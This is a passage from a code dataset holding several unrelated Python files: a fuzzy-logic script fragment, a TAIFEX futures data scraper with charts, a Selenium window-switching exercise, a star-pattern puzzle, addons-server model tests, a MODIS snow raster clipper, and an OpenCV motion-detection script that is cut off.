defuzifikasi(self):\r\n\toutput=(self.alpa[0]*self.z[0])+(\r\n\t\tself.alpa[1]*self.z[1])+(self.alpa[2]*self.z[2])+(self.alpa[3]*self.z[3])\r\n\toutput1=self.alpa[0]+self.alpa[1]+self.alpa[2]+self.alpa[3]\r\n\treturn output/output1\r\n\r\n#main program\r\nfz= fuzzy(3200,140)\r\nprint(\"permintaan turun =\".fz.permTurun)\r\nprint(\"permintaan naik =\".fz.permNaik)\r\nprint(\"persediaan sedikit =\".fz.psdSedikit)\r\nprint(\"persediaan banyak =\".fz.psdBanyak)\r\nprint(\"nilai seluruh perdiket =\".fz.alpa)\r\nprint(\"nilai seluruh z =\".fz.z)\r\nprint(\"produksi adalah =\".fz.defuzifikasi())","repo_name":"achmadrosyid/python","sub_path":"temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":2651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"4448904857","text":"import pandas as pd\nfrom matplotlib.font_manager import findfont, FontProperties\nimport matplotlib.pyplot as plt\nimport os, csv, time, datetime, requests\n\n\nplt.rcParams['font.sans-serif'] = ['Microsoft JhengHei'] \nplt.rcParams['axes.unicode_minus'] = False\ntoday = datetime.date.today() #今日日期\nyesterday = str(today - datetime.timedelta(days=1))\ntoday = str(today)\npath = 'C:\\\\Users\\\\RF\\\\Desktop\\\\coding\\\\op\\\\'\nt = time.localtime()\nt1 = time.asctime(t)\n\n#讀取昨日檔案, 可用pandas, 可用def\nyesterday_data = []\ndef load_file(load_date, list_data, file_date):\n if os.path.isfile(path +load_date + '.csv'): # 檢查檔案在不在\n print('yes,找到', file_date , '檔案')\n with open(path + load_date +'.csv', encoding='utf-8') as f:\n rows = csv.reader(f)\n for line in rows:\n if 'Foreign' in line:\n continue\n list_data.append(line)\n print(list_data)\n else:\n print('找不到', file_date, '檔案...')\n \nload_file(yesterday, yesterday_data, '昨日')\n\n\n#爬取 op & fu 資料 \nop = 'https://www.taifex.com.tw/cht/3/futAndOptDateExcel'\ntable = pd.read_html(requests.get(op, headers={'User-agent': 'Mozilla/5.0(Windows NT 6.1; Win64; x64)AppleWebKit/537.36(KHTML, like Gecko)Chrome/63.0.3239.132 Safari/537.36'}).text)\nfu_url = 'https://www.taifex.com.tw/cht/3/futContractsDateExcel'\nfu_table = pd.read_html(requests.get(fu_url, headers={'User-agent': 'Mozilla/5.0(Windows NT 6.1; Win64; x64)AppleWebKit/537.36(KHTML, like Gecko)Chrome/63.0.3239.132 Safari/537.36'}).text)\nop_bc_bp = 'https://www.taifex.com.tw/cht/3/callsAndPutsDateExcel'\nop_table = pd.read_html(requests.get(op_bc_bp, headers={'User-agent': 'Mozilla/5.0(Windows NT 6.1; Win64; x64)AppleWebKit/537.36(KHTML, like Gecko)Chrome/63.0.3239.132 Safari/537.36'}).text)\n\n# sm_fu_call = int(fu_table[1].iloc[11][9]) + int(fu_table[1].iloc[9][9]) #外資和自營商小台\n# sm_fu_put = int(fu_table[1].iloc[11][11]) + int(fu_table[1].iloc[9][11]) #外資和自營商小台\n# fu_call_number_total = table[3].iloc[2, 1]\n# fu_put_number_total = table[3].iloc[2, 5]\n\nsm_fu_call = int(fu_table[1].iloc[11][9])\nsm_fu_put = int(fu_table[1].iloc[11][11])\nfu_call_number = int(fu_table[1].iloc[2][9])\nfu_put_number = int(fu_table[1].iloc[2][11])\nop_call_money = int(table[3].iloc[2][4])\nop_put_money = int(table[3].iloc[2][8])\nop_call_number = int(table[3].iloc[2][2])\nop_put_number = int(table[3].iloc[2][6])\nfu_call_money = int(table[3].iloc[2][3])\nfu_put_money = int(table[3].iloc[2][7])\n#BCBP_SCSP分計\n# 外資\nbc_nb = int(op_table[1].iloc[2][10])\nsp_nb = int(op_table[1].iloc[5][12])\nbp_nb = int(op_table[1].iloc[5][10])\nsc_nb = int(op_table[1].iloc[2][12])\nbc_mny = int(op_table[1].iloc[2][11])\nsp_mny = int(op_table[1].iloc[5][13])\nbp_mny = int(op_table[1].iloc[5][11])\nsc_mny = int(op_table[1].iloc[2][13])\n#自營商\nbcsf_nb = int(op_table[1].iloc[0][10])\nbpsf_nb = int(op_table[1].iloc[3][10])\nscsf_nb = int(op_table[1].iloc[0][12])\nspsf_nb = int(op_table[1].iloc[3][12])\nbcsf_mny = int(op_table[1].iloc[0][11])\nbpsf_mny = int(op_table[1].iloc[3][11])\nscsf_mny = int(op_table[1].iloc[0][13])\nspsf_mny = int(op_table[1].iloc[3][13])\n\n\na = ['Op_call_money', 'Op_put_money', 'Op_call_number', 'Op_put_number', 'Fu_call_money', 'Fu_put_money', 'Fu_call_number', 'Fu_put_number', 'Sm_fu_call', 'Sm_fu_put',\n 'Bc_nb', 'Bp_nb', 'Bc_mny', 'Bp_mny', 'Sc_nb', 'Sp_nb', \"Sc_mny\", 'Sp_mny', 'bcsf_nb', 'bpsf_nb', 'bcsf_mny', 'bpsf_mny', 'scsf_nb', 'spsf_nb', 'scsf_mny', 'spsf_mny']\nb = [op_call_money, op_put_money, op_call_number,op_put_number, fu_call_money, fu_put_money, fu_call_number, fu_put_number, sm_fu_call, sm_fu_put,\n bc_nb, bp_nb, bc_mny, bp_mny, sc_nb, sp_nb, sc_mny, sp_mny, bcsf_nb, bpsf_nb, bcsf_mny, bpsf_mny, scsf_nb, spsf_nb, scsf_mny, spsf_mny]\ndata = pd.DataFrame({'Foreign' : a,'Amount' : b})\ndata.to_csv(path + str(today) +'.csv', index = False, sep=str(','), encoding='utf-8')\n\n\n\n#讀取今日檔案, 可用pandas\ntoday_data = []\nload_file(today, today_data, '今日')\n\n#資料分析\n\nyes_data_list = [int(yesterday_data[i][1]) for i in range(len(yesterday_data))]\ntoday_data_list = [int(today_data[i][1]) for i in range(len(today_data))]\ndif_list = [today_data_list[i] - yes_data_list[i] for i in range(len(today_data_list))]\nprint(dif_list)\n#Normalize \nNormalize_list = [dif_list[i] / today_data_list[i] for i in range(len(today_data_list))]\n\n\n\n\ndef autolabel(rects):\n \"\"\"Attach a text label above each bar in *rects*, displaying its height.\"\"\"\n for rect in rects:\n height = rect.get_height()\n plt.annotate('{}'.format(height),\n xy=(rect.get_x() + rect.get_width() / 2, height),\n xytext=(0, 3), # 3 points vertical offset\n textcoords=\"offset points\",\n ha='center', va='bottom')\n\ndef data_visualization(x_range, y_range, save_name, title):\n rects = plt.bar(x_range, y_range, color=['firebrick','g'])\n plt.title(title)\n autolabel(rects) #remark content\n path = 'C:\\\\Users\\\\RF\\\\Desktop\\\\coding\\\\op\\\\' + today +'\\\\'\n if not os.path.isdir(path):\n os.mkdir(path)\n plt.savefig( path + today + save_name, dpi=200)\n plt.show()\n \ndef data_print(a=a, dif_list=dif_list):\n data_visualization(a[0:2], dif_list[0:2], '_外資總OP金額差異.png', '外資總OP金額差異')\n print('外資多單op增加', str(dif_list[0]) , '金額')\n print('percent: {:.2%}'.format(Normalize_list[0]))\n print('外資空單op增加', str(dif_list[1]) , '金額')\n print('percent: {:.2%}'.format(Normalize_list[1]))\n data_visualization(a[2:4], dif_list[2:4], '_外資總OP口數差異.png','外資總OP口數差異')\n print('外資多單總op增加', str(dif_list[2]) , '口')\n print('percent: {:.2%}'.format(Normalize_list[2]))\n print('外資空單總op增加', str(dif_list[3]) , '口')\n print('percent: {:.2%}'.format(Normalize_list[3]))\n data_visualization(a[4:6], dif_list[4:6], '_外資總期貨金額差異.png','外資總期貨金額差異')\n print('外資多單期貨增加', str(dif_list[4]) , '金額')\n print('percent: {:.2%}'.format(Normalize_list[4]))\n print('外資空單期貨增加', str(dif_list[5]) , '金額')\n print('percent: {:.2%}'.format(Normalize_list[5]))\n data_visualization(a[6:8], dif_list[6:8], '_外資大台期貨差異.png','外資大台期貨差異')\n print('外資多單期貨增加', str(dif_list[6]) , '口')\n print('percent: {:.2%}'.format(Normalize_list[6]))\n print('外資空單期貨增加', str(dif_list[7]) , '口')\n print('percent: {:.2%}'.format(Normalize_list[7]))\n data_visualization(a[8:10], dif_list[8:10], '_外資小台期貨差異.png','外資小台期貨差異')\n print('外資小台多單期貨增加', str(dif_list[8]) , '口')\n print('percent: {:.2%}'.format(Normalize_list[8]))\n print('外資小台空單期貨增加', str(dif_list[9]) , '口')\n print('percent: {:.2%}'.format(Normalize_list[9]))\n data_visualization(a[10:12], dif_list[10:12], '_外資BCBP口數差異.png','外資BCBP口數差異')\n print('外資BC增加', str(dif_list[10]) , '口')\n print('percent: {:.2%}'.format(Normalize_list[10]))\n print('外資BP增加', str(dif_list[11]) , '口')\n print('percent: {:.2%}'.format(Normalize_list[11]))\n data_visualization(a[12:14], dif_list[12:14], '_外資BCBP金額差異.png','外資BCBP金額差異')\n print('外資BC增加', str(dif_list[12]) , '金額')\n print('percent: {:.2%}'.format(Normalize_list[12]))\n print('外資BP增加', str(dif_list[13]) , '金額')\n print('percent: {:.2%}'.format(Normalize_list[13]))\n data_visualization(a[14:16], dif_list[14:16], '_外資SCSP口數差異.png','外資SCSP口數差異')\n print('外資SC增加', str(dif_list[14]) , '口')\n print('percent: {:.2%}'.format(Normalize_list[14]))\n print('外資SP增加', str(dif_list[15]) , '口')\n print('percent: {:.2%}'.format(Normalize_list[15]))\n data_visualization(a[16:18], dif_list[16:18], '_外資SCSP金額差異.png','外資SCSP金額差異')\n print('外資SC增加', str(dif_list[16]) , '金額')\n print('percent: {:.2%}'.format(Normalize_list[16]))\n print('外資SP增加', str(dif_list[17]) , '金額')\n print('percent: {:.2%}'.format(Normalize_list[17]))\n data_visualization(a[18:20], dif_list[18:20], '_自營BCBP口數差異.png','自營BCBP口數差異')\n print('自營BC增加', str(dif_list[18]) , '口')\n print('percent: {:.2%}'.format(Normalize_list[18]))\n print('自營BP增加', str(dif_list[19]) , '口')\n print('percent: {:.2%}'.format(Normalize_list[19]))\n data_visualization(a[20:22], dif_list[20:22], '_自營BCBP金額差異.png','自營BCBP金額差異')\n print('自營BC增加', str(dif_list[20]) , '金額')\n print('percent: {:.2%}'.format(Normalize_list[20]))\n print('自營BP增加', str(dif_list[21]) , '金額')\n print('percent: {:.2%}'.format(Normalize_list[21]))\n data_visualization(a[22:24], dif_list[22:24], '_自營SCSP口數差異.png','自營SCSP口數差異')\n print('自營SC增加', str(dif_list[22]) , '口')\n print('percent: {:.2%}'.format(Normalize_list[22]))\n print('自營SP增加', str(dif_list[23]) , '口')\n print('percent: {:.2%}'.format(Normalize_list[23]))\n data_visualization(a[24:26], dif_list[24:26], '_自營SCS金額差異.png','自營SCSP金額差異')\n print('自營SC增加', str(dif_list[24]) , '金額')\n print('percent: {:.2%}'.format(Normalize_list[24]))\n print('自營SP增加', str(dif_list[25]) , '金額')\n print('percent: {:.2%}'.format(Normalize_list[25]))\n\n print(t1)\n\n #將圖畫在一張figure\n # path = 'C:\\\\Users\\\\RF\\\\Desktop\\\\coding\\\\op\\\\' + today +'\\\\'\n # plt.figure()\n # plt.subplot(1,2,1)\n # plt.bar(a[0:2], dif_list[0:2], color=['firebrick','g'])\n # plt.subplot(1,2,2)\n # plt.bar(a[2:4], dif_list[2:4], color=['firebrick','g'])\n # plt.savefig(path + str(today) + '_dif_op.png', dpi=200)\n # plt.show()\n\n # plt.figure()\n # plt.subplot(1,2,1)\n # plt.bar(a[4:6], dif_list[4:6], color=['firebrick','g'])\n # plt.subplot(1,2,2)\n # plt.bar(a[6:8], dif_list[6:8], color=['firebrick','g'])\n # plt.savefig(path + str(today) + '_dif_fu.png', dpi=200)\n # plt.show()\n\ndata_print()\n\n# import utils\n# uploaded_image = utils.UploadToImgur(path + str(today) + 'op_money_.png', title='123')\n\n# dpi=300\n#畫圖表,rot旋轉X軸座標名稱\n# datas = pd.Series(b, index=a)\n# datas.loc[['Op_call_money', 'Op_put_money']].plot(kind='bar', rot=0) \n# plt.ylim(ymax= 2500000) #設定座標Y軸上限","repo_name":"EasonPeng-TW/OP","sub_path":"op.py","file_name":"op.py","file_ext":"py","file_size_in_byte":10660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"72881441912","text":"from selenium import webdriver\r\nimport time\r\n\r\nclass Switch():\r\n def test(self):\r\n driver = webdriver.Chrome(\r\n executable_path=\"C:\\\\Users\\\\M524891\\\\PycharmProjects\\\\workspace_python\\\\drivers\\\\chromedriver.exe\")\r\n driver.maximize_window()\r\n driver.execute_script(\"window.location='https://letskodeit.teachable.com/p/practice';\")\r\n driver.implicitly_wait(3)\r\n parent_handle=driver.current_window_handle\r\n print(\"Parent Handle is \"+parent_handle)\r\n driver.find_element_by_id(\"openwindow\").click()\r\n time.sleep(2)\r\n sub_Handles = driver.window_handles\r\n for handle in sub_Handles:\r\n print(handle)\r\n print(type(handle))\r\n if handle not in parent_handle:\r\n driver.switch_to.window(handle)\r\n print(\"Currently in child handle\")\r\n driver.find_element_by_id(\"search-courses\").send_keys(\"Python\")\r\n time.sleep(2)\r\n break\r\n driver.switch_to.window(parent_handle)\r\n driver.find_element_by_id(\"name\").send_keys(\"testing done\")\r\n time.sleep(3)\r\n driver.quit()\r\n\r\ns=Switch()\r\ns.test()\r\n","repo_name":"pns845/Selenium","sub_path":"Module_22Switch.py","file_name":"Module_22Switch.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"42327510342","text":"import sys\r\n\r\ndef count_star(n):\r\n ret = []\r\n for i in range(3*len(n)):\r\n if i//len(n) == 1:\r\n ret.append(n[i % len(n)] + \" \" * len(n) + n[i%len(n)])\r\n else:\r\n ret.append(n[i%len(n)]*3)\r\n return ret\r\n\r\n\r\nn = int(sys.stdin.readline())\r\nk = 0\r\nstar=[\"***\",\"* *\", \"***\"]\r\nwhile n != 3:\r\n n//=3\r\n k+=1\r\nfor i in range(k):\r\n star = count_star(star)\r\nfor i in star:\r\n print(i)\r\n","repo_name":"aeyongdodam/python","sub_path":"0307-0313/2447 - 별 찍기 - 10.py","file_name":"2447 - 별 찍기 - 10.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"23600168811","text":"import datetime\nfrom unittest import mock\n\nfrom django.conf import settings\nfrom django.test.utils import override_settings\n\nfrom olympia import amo, core\nfrom olympia.activity.models import ActivityLog\nfrom olympia.amo.tests import addon_factory, TestCase, user_factory\nfrom olympia.amo.urlresolvers import reverse\nfrom olympia.constants import applications, promoted\nfrom olympia.promoted.models import (\n PromotedAddon,\n PromotedApproval,\n PromotedSubscription,\n)\n\n\nclass TestPromotedAddon(TestCase):\n def test_basic(self):\n promoted_addon = PromotedAddon.objects.create(\n addon=addon_factory(), group_id=promoted.SPONSORED.id\n )\n assert promoted_addon.group == promoted.SPONSORED\n assert promoted_addon.application_id is None\n assert promoted_addon.all_applications == [\n applications.FIREFOX,\n applications.ANDROID,\n ]\n\n promoted_addon.update(application_id=applications.FIREFOX.id)\n assert promoted_addon.all_applications == [applications.FIREFOX]\n\n def test_is_approved_applications(self):\n addon = addon_factory()\n promoted_addon = PromotedAddon.objects.create(\n addon=addon, group_id=promoted.LINE.id\n )\n assert addon.promotedaddon\n # Just having the PromotedAddon instance isn't enough\n assert addon.promotedaddon.approved_applications == []\n\n # the current version needs to be approved also\n promoted_addon.approve_for_version(addon.current_version)\n addon.reload()\n assert addon.promotedaddon.approved_applications == [\n applications.FIREFOX,\n applications.ANDROID,\n ]\n\n # but not if it's for a different type of promotion\n promoted_addon.update(group_id=promoted.SPONSORED.id)\n assert addon.promotedaddon.approved_applications == []\n # unless that group has an approval too\n PromotedApproval.objects.create(\n version=addon.current_version,\n group_id=promoted.SPONSORED.id,\n application_id=applications.FIREFOX.id,\n )\n addon.reload()\n assert addon.promotedaddon.approved_applications == [applications.FIREFOX]\n\n # for promoted groups that don't require pre-review though, there isn't\n # a per version approval, so a current_version is sufficient and all\n # applications are seen as approved.\n promoted_addon.update(group_id=promoted.STRATEGIC.id)\n assert addon.promotedaddon.approved_applications == [\n applications.FIREFOX,\n applications.ANDROID,\n ]\n\n def test_creates_a_subscription_when_group_should_have_one(self):\n assert PromotedSubscription.objects.count() == 0\n\n promoted_addon = PromotedAddon.objects.create(\n addon=addon_factory(), group_id=promoted.SPONSORED.id\n )\n\n assert PromotedSubscription.objects.count() == 1\n assert PromotedSubscription.objects.all()[0].promoted_addon == promoted_addon\n\n # Do not create a subscription twice.\n promoted_addon.save()\n assert PromotedSubscription.objects.count() == 1\n\n def test_no_subscription_created_when_group_should_not_have_one(self):\n assert PromotedSubscription.objects.count() == 0\n\n PromotedAddon.objects.create(addon=addon_factory(), group_id=promoted.LINE.id)\n\n assert PromotedSubscription.objects.count() == 0\n\n def test_auto_approves_addon_when_saved_for_immediate_approval(self):\n # empty case with no group set\n promo = PromotedAddon.objects.create(\n addon=addon_factory(), application_id=amo.FIREFOX.id\n )\n assert promo.group == promoted.NOT_PROMOTED\n assert promo.approved_applications == []\n assert not PromotedApproval.objects.exists()\n\n # first test with a group.immediate_approval == False\n promo.group_id = promoted.RECOMMENDED.id\n promo.save()\n promo.addon.reload()\n assert promo.approved_applications == []\n assert not PromotedApproval.objects.exists()\n promo.addon.promoted_group() == promoted.NOT_PROMOTED\n\n # then with a group thats immediate_approval == True\n promo.group_id = promoted.SPOTLIGHT.id\n promo.save()\n promo.addon.reload()\n assert promo.approved_applications == [amo.FIREFOX]\n assert PromotedApproval.objects.count() == 1\n promo.addon.promoted_group() == promoted.SPOTLIGHT\n\n # test the edge case where the application was changed afterwards\n promo.application_id = 0\n promo.save()\n promo.addon.reload()\n assert promo.approved_applications == [amo.FIREFOX, amo.ANDROID]\n assert PromotedApproval.objects.count() == 2\n\n @mock.patch('olympia.lib.crypto.tasks.sign_file')\n def test_approve_for_addon(self, mock_sign_file):\n core.set_user(user_factory())\n task_user = user_factory(id=settings.TASK_USER_ID)\n promo = PromotedAddon.objects.create(\n addon=addon_factory(version_kw={'version': '0.123a'}),\n group_id=promoted.SPOTLIGHT.id,\n )\n file_ = promo.addon.current_version.all_files[0]\n file_.update(filename='webextension.xpi')\n with amo.tests.copy_file(\n 'src/olympia/files/fixtures/files/webextension.xpi', file_.file_path\n ):\n # SPOTLIGHT doesnt have special signing states so won't be resigned\n promo.addon.reload()\n promo.addon.promoted_group() == promoted.NOT_PROMOTED\n promo.approve_for_addon()\n promo.addon.reload()\n promo.addon.promoted_group() == promoted.SPOTLIGHT\n assert promo.addon.current_version.version == '0.123a'\n mock_sign_file.assert_not_called()\n\n # VERIFIED does though.\n promo.update(group_id=promoted.VERIFIED.id)\n promo.addon.reload()\n promo.addon.promoted_group() == promoted.NOT_PROMOTED\n promo.approve_for_addon()\n promo.addon.reload()\n promo.addon.promoted_group() == promoted.VERIFIED\n assert promo.addon.current_version.version == '0.123a.1-signed'\n mock_sign_file.assert_called_with(file_)\n assert (\n ActivityLog.objects.for_addons((promo.addon,))\n .filter(action=amo.LOG.VERSION_RESIGNED.id)\n .exists()\n )\n alog = ActivityLog.objects.filter(action=amo.LOG.VERSION_RESIGNED.id).get()\n assert alog.user == task_user\n assert '0.123a.1-signed re-signed (previously 0.123a)' in (str(alog))\n\n def test_get_resigned_version_number(self):\n addon = addon_factory(\n version_kw={'version': '0.123a'},\n file_kw={'status': amo.STATUS_AWAITING_REVIEW},\n )\n promo = PromotedAddon.objects.create(addon=addon, group_id=promoted.VERIFIED.id)\n assert addon.current_version is not None\n assert promo.get_resigned_version_number() is None\n\n addon.current_version.current_file.update(status=amo.STATUS_APPROVED)\n assert promo.get_resigned_version_number() == '0.123a.1-signed'\n\n addon.current_version.update(version='123.4.1-signed')\n assert promo.get_resigned_version_number() == '123.4.1-signed-2'\n\n addon.current_version.update(version='123.4.1-signed-2')\n assert promo.get_resigned_version_number() == '123.4.1-signed-3'\n\n addon.current_version.delete()\n addon.reload()\n assert addon.current_version is None\n assert promo.get_resigned_version_number() is None\n\n def test_has_pending_subscription(self):\n promo = PromotedAddon.objects.create(\n addon=addon_factory(), group_id=promoted.RECOMMENDED.id\n )\n PromotedSubscription.objects.create(promoted_addon=promo)\n\n # checking the group doesn't require subscription\n assert not promo.group.require_subscription\n assert hasattr(promo, 'promotedsubscription')\n assert not promo.promotedsubscription.is_active\n assert not promo.has_approvals\n assert not promo.has_pending_subscription\n\n # and when it does\n promo.update(group_id=promoted.VERIFIED.id)\n assert promo.group.require_subscription\n assert hasattr(promo, 'promotedsubscription')\n assert not promo.promotedsubscription.is_active\n assert not promo.has_approvals\n assert promo.has_pending_subscription\n\n # when there isn't a subscription (existing promo before subscriptions)\n promo.promotedsubscription.delete()\n promo = PromotedAddon.objects.get(id=promo.id)\n assert promo.group.require_subscription\n assert not hasattr(promo, 'promotedsubscription')\n assert not promo.has_pending_subscription\n\n # and when there is\n PromotedSubscription.objects.create(promoted_addon=promo)\n assert promo.group.require_subscription\n assert hasattr(promo, 'promotedsubscription')\n assert not promo.promotedsubscription.is_active\n assert not promo.has_approvals\n assert promo.has_pending_subscription\n\n # when there's a subscription that's been paid\n promo.promotedsubscription.update(checkout_completed_at=datetime.datetime.now())\n assert promo.group.require_subscription\n assert hasattr(promo, 'promotedsubscription')\n assert promo.promotedsubscription.is_active\n assert not promo.has_approvals\n assert not promo.has_pending_subscription\n\n # and when it's not been paid\n promo.promotedsubscription.update(checkout_completed_at=None)\n assert promo.group.require_subscription\n assert hasattr(promo, 'promotedsubscription')\n assert not promo.promotedsubscription.is_active\n assert not promo.has_approvals\n assert promo.has_pending_subscription\n\n # when there's an existing version approved (existing promo)\n promo.approve_for_version(promo.addon.current_version)\n assert promo.group.require_subscription\n assert hasattr(promo, 'promotedsubscription')\n assert not promo.promotedsubscription.is_active\n assert promo.has_approvals\n assert not promo.has_pending_subscription\n\n def test_has_approvals(self):\n addon = addon_factory()\n promoted_addon = PromotedAddon.objects.create(\n addon=addon, group_id=promoted.SPONSORED.id\n )\n\n assert not promoted_addon.has_approvals\n\n promoted_addon.approve_for_version(addon.current_version)\n promoted_addon.reload()\n\n assert promoted_addon.has_approvals\n\n\nclass TestPromotedSubscription(TestCase):\n def test_get_onboarding_url_with_new_object(self):\n sub = PromotedSubscription()\n\n assert sub.get_onboarding_url() is None\n\n def test_get_relative_onboarding_url(self):\n promoted_addon = PromotedAddon.objects.create(\n addon=addon_factory(), group_id=promoted.SPONSORED.id\n )\n sub = PromotedSubscription.objects.filter(promoted_addon=promoted_addon).get()\n\n assert sub.get_onboarding_url(absolute=False) == reverse(\n 'devhub.addons.onboarding_subscription',\n args=[sub.promoted_addon.addon.slug],\n add_prefix=False,\n )\n\n def test_get_onboarding_url(self):\n promoted_addon = PromotedAddon.objects.create(\n addon=addon_factory(), group_id=promoted.SPONSORED.id\n )\n sub = PromotedSubscription.objects.filter(promoted_addon=promoted_addon).get()\n\n external_site_url = 'http://example.org'\n with override_settings(EXTERNAL_SITE_URL=external_site_url):\n url = sub.get_onboarding_url()\n assert url == '{}{}'.format(\n external_site_url,\n reverse(\n 'devhub.addons.onboarding_subscription',\n args=[sub.promoted_addon.addon.slug],\n add_prefix=False,\n ),\n )\n assert 'en-US' not in url\n\n def test_stripe_checkout_completed(self):\n sub = PromotedSubscription()\n\n assert not sub.stripe_checkout_completed\n\n sub.update(checkout_completed_at=datetime.datetime.now())\n\n assert sub.stripe_checkout_completed\n\n def test_stripe_checkout_cancelled(self):\n sub = PromotedSubscription()\n\n assert not sub.stripe_checkout_cancelled\n\n sub.update(checkout_cancelled_at=datetime.datetime.now())\n\n assert sub.stripe_checkout_cancelled\n\n def test_is_active(self):\n sub = PromotedSubscription()\n\n assert sub.is_active is None\n\n sub.update(checkout_completed_at=datetime.datetime.now())\n\n assert sub.is_active\n\n sub.update(cancelled_at=datetime.datetime.now())\n\n assert sub.is_active is False\n","repo_name":"imfht/djangoapps","sub_path":"addons-server-master/src/olympia/promoted/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":12896,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"95"} +{"seq_id":"3985856328","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 16 10:21:20 2021\n\n@author: karlo\n\"\"\"\n\n\nimport pandas as pd\nimport geopandas as gpd\nimport os\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport rioxarray as rxr\nfrom shapely.geometry import mapping\nfrom datetime import datetime\nimport datetime as dt\n\n\ndef hdf_clip(raster_folder, shape_file):\n \"\"\"\n Function reads the 8-day.hdf raster from raster folder, and .shp shapefile\n used to clip them.\n It creates a list of tuples, which hold the date and the snow data.\n Since, data is available only each 8th day, the 1st day data gets copied\n until next day (data) is available. \n \n Parameters\n ----------\n raster_folder : string \n - path to folder with .hdf rasters\n shape_file : string\n - path to the shapefile of the basin\n\n Returns\n -------\n clipps : list of tuples\n Clipped numpy arrays.\n \"\"\"\n clipps = list()\n rasters = [ras for ras in os.listdir(raster_folder) if ras.endswith(\".hdf\")] # lists all rasters\n shape = gpd.read_file(shape_file, crs=\"epsg:4326\") # reads the shapefile for clipping\n for idx, raster in enumerate(rasters):\n doy = raster[13:16] \n year = raster[9:13]\n xds = rxr.open_rasterio(raster_folder + raster, masked=True, chunks=True)\n clipped = xds.rio.clip(shape.geometry.apply(mapping), shape.crs, drop=True) # clipping the rasters\n \"\"\" Creating the datetime date of the data paoint, and snow data .\"\"\" \n date = datetime.strptime(year + \"-\" + doy, \"%Y-%j\")\n snow = np.nan_to_num(clipped.Maximum_Snow_Extent.values.squeeze())\n # converting the date to string wit CRO format\n data = (date, snow) # creatingthe data tuple\n if clipps: # if list not empty\n prev_date = clipps[-1][0] # checkign last entry in the list\n now_date = date\n diff = abs(prev_date - now_date) - dt.timedelta(1) # calculating the number of \"missing\" days\n print (\"The difference is {}.\".format(diff)) \n if diff > dt.timedelta(50): \n print (\"The difference is {}. Check the {} raster!\".format(diff, date))\n else:\n for _ in range(diff.days): # iterating over day difference\n date_ = clipps[-1][0]\n date_time, snow = date_ + dt.timedelta(1), clipps[-1][1]\n \"\"\" Creating the datetime date of the data paoint, and \n copying snow data from the last entry in the list.\"\"\"\n clipps.append((date_time, snow)) # appending the copied data to the list\n prev_date += dt.timedelta(1)\n clipps.append(data) # appending the clipped raster data to the list \n print(\"Clipping rasters has been finished. The raster have been saved to the list clipps.\")\n return clipps \n \n\ndef create_raster_files(basin_name, input_folder, output_folder):\n \"\"\"\n The function takes default Modis rasters, executes the hadf_clip function for the desired basin\n and returns seperate .npy files for each day in the desired output folder.\n\n Parameters\n ----------\n basin_name : str\n Name of the basin (should be in basin folder).\n input_folder : str\n Path to the input folder with uncuit MODIS .hdf rasters.\n output_folder : str\n Path to the output folder.\n\n Returns\n -------\n None.\n\n \"\"\"\n hdf_raster_folder = \"D:\\\\OneDrive\\\\Python\\\\12_pyModis\\\\\" + input_folder + \"\\\\\"\n shape_file = \"D:\\\\OneDrive\\\\Python\\\\12_pyModis\\\\basin\\\\\" + basin_name + \"\\\\\" +basin_name +\"_Basin.shp\"\n clipps = hdf_clip(hdf_raster_folder, shape_file)\n if not os.path.isdir(output_folder +\"\\\\\"):\n os.mkdir(output_folder +\"\\\\\")\n for (date, raster) in clipps:\n date = str(date)[:10]\n np.save(output_folder + \"\\\\\" + date + \".npy\", raster)\n print (\"Creating files have been finished. The files have been saved to the folder {}.\".format(output_folder)) \n\n\n\n\n \n\n\n\n\n\nif __name__ == '__main__':\n \n basin_name = \"Sill\"\n input_folder = \"data_modis_complete\"\n output_folder = \"D:\\\\Sill_modis\"\n \n clipps = create_raster_files(basin_name, input_folder, output_folder)\n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"karlek10/pyModis","sub_path":"prepare_MODIS.py","file_name":"prepare_MODIS.py","file_ext":"py","file_size_in_byte":4251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"12399094891","text":"# -*- coding: UTF-8 -*-\n#使用BackgroundSubtractorMOG\nimport cv2 as cv\nimport numpy as np\n\n# 设置文件\n# file_test = \"E:/opencv_vs/opencv/sources/samples/data/vtest.avi\"\ncap = cv.VideoCapture(0)\n\n# 设置变量\nkernel = cv.getStructuringElement(cv.MORPH_ELLIPSE, (2, 2)) # 定义结构元素\ncolor_m = (255, 0, 0)\n\n# 背景差法\nfgbg = cv.bgsegm.createBackgroundSubtractorMOG()\n\n# 视频文件输出参数设置\nout_fps = 12.0 # 输出文件的帧率\nfourcc = cv.VideoWriter_fourcc('M', 'P', '4', '2')\nout = cv.VideoWriter('E:/video/v9.avi', fourcc, out_fps, (500, 500))\n\nwhile True:\n # 读取一帧\n ret, frame = cap.read()\n # 如果视频结束,跳出循环\n if not ret:\n break\n frame = cv.resize(frame, (500, 500), interpolation=cv.INTER_CUBIC)\n frame_motion = frame.copy()\n\n # 计算前景掩码\n fgmask = fgbg.apply(frame_motion)\n draw1 = cv.threshold(fgmask, 25, 255, cv.THRESH_BINARY)[1] # 二值化\n draw1 = cv.dilate(draw1, kernel, iterations=1)\n\n # 查找检测物体的轮廓,只检测外轮廓,只需4个点来保存轮廓信息\n image_m, contours_m, hierarchy_m = cv.findContours(draw1.copy(), cv.RETR_EXTERNAL, cv.CHAIN_APPROX_SIMPLE)\n\n for c in contours_m:\n if cv.contourArea(c) < 300:\n continue\n (x, y, w, h) = cv.boundingRect(c)\n cv.rectangle(frame_motion, (x, y), (x + w, y + h), color_m, 2)\n\n cv.imshow(\"source\", frame_motion)\n cv.imshow(\"apply\", fgmask)\n cv.imshow(\"draw\", draw1)\n k = cv.waitKey(200)\n if k == ord('q'):\n 